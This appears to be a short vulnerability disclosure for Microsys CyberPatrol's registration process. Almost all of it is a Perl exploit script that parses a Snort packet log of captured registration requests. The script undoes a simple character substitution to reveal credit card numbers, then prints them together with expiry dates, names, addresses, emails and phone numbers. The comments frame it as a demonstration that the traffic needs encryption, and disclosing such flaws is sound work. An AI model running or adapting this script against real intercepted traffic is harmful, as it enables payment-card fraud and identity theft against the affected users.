Microsys CyberPatrol Insecure Registration Vulnerability
# The following exploit is for use with Snort and will print the clear text information in a readable table:
#!/usr/bin/perl
#
# Reads the file "log" in the current directory. After a line containing
# "POST", the second space-separated token of each line is appended to a
# buffer. At the next line with no word characters the buffer is decoded
# and the registration fields found in it are printed.
#
# What the listing demonstrates, as far as the code shows: the CARD field
# is covered only by a fixed character-for-digit substitution (the table
# below), and every other field is printed as captured apart from %20 and
# %40 decoding. A passive observer of the traffic could presumably read
# all of it. The remedy is to encrypt the registration request in
# transit, not to swap in a different substitution.

# Ordered substitution table: the first pattern that matches wins.
my @digit_for = (
    [ qr/z/,   '0' ],
    [ qr/\{/,  '1' ],
    [ qr/x/,   '2' ],
    [ qr/y/,   '3' ],
    [ qr/%7E/, '4' ],
    [ qr/\./,  '5' ],
    [ qr/\|/,  '6' ],
    [ qr/\}/,  '7' ],
    [ qr/r/,   '8' ],
    [ qr/s/,   '9' ],
);

# Fields that are printed unchanged, followed by a single newline.
my @plain_fields = ( [ 3, 'NAME' ], [ 4, 'ADDR1' ], [ 5, 'ADDR2' ], [ 6, 'CITY' ] );

my $capturing = 0;    # true while lines are being collected after a POST
my $registerinfo;     # collected request text

# The result of open is not checked: if "log" is missing the loop below
# simply never runs and nothing is printed.
open(my $snort_log, '<', 'log');

LINE:
while (my $line = <$snort_log>) {

    # Skip lines that split into 2..15 whitespace-separated columns.
    my @columns = split /\s/, $line;
    next LINE if @columns > 1 && @columns < 16;

    # A line without any word character ends the collected record.
    if ($line !~ /\w/) {
        $registerinfo =~ s/%20/ /g;
        $registerinfo =~ s/%40/\@/g;

        # Keep only what follows the first "...." in the buffer.
        my $discard;
        ($discard, $registerinfo) = split /\.\.\.\./, $registerinfo;
        my @fields = split /&/, $registerinfo;

        print "$fields[0]\n" if $fields[0] =~ /EMAIL/;
        print "CARD="        if $fields[1] =~ /CARD/;

        # Walk field 1 one character at a time; a '%' is read together
        # with the two characters after it as one token.
        my @chars = split //, $fields[1];
        my $pos   = 0;
        while ($pos < @chars) {
            my $token = "$chars[$pos]";
            if ($token =~ /%/) {
                $token .= "$chars[$pos + 1]";
                $token .= "$chars[$pos + 2]";
                $pos += 2;
            }
            ++$pos;

            # Tokens that match no pattern (such as the letters of
            # "CARD=") print nothing.
            for my $rule (@digit_for) {
                my ($pattern, $digit) = @{$rule};
                if ($token =~ $pattern) {
                    print $digit;
                    last;
                }
            }
        }

        print "\n$fields[2]\n" if $fields[2] =~ /EXP/;
        for my $entry (@plain_fields) {
            my ($index, $label) = @{$entry};
            print "$fields[$index]\n" if $fields[$index] =~ /$label/;
        }
        print "$fields[7]\n\n\n" if $fields[7] =~ /PHONE/;

        # Reset for the next record.
        $registerinfo = "";
        $capturing    = 0;
    }

    $capturing = 1 if $line =~ /POST/;

    if ($capturing) {
        # Only the second space-separated token of the line is kept.
        my $discard;
        ($discard, $line) = split / /, $line;
        chomp($line);
        $registerinfo .= $line;
    }
}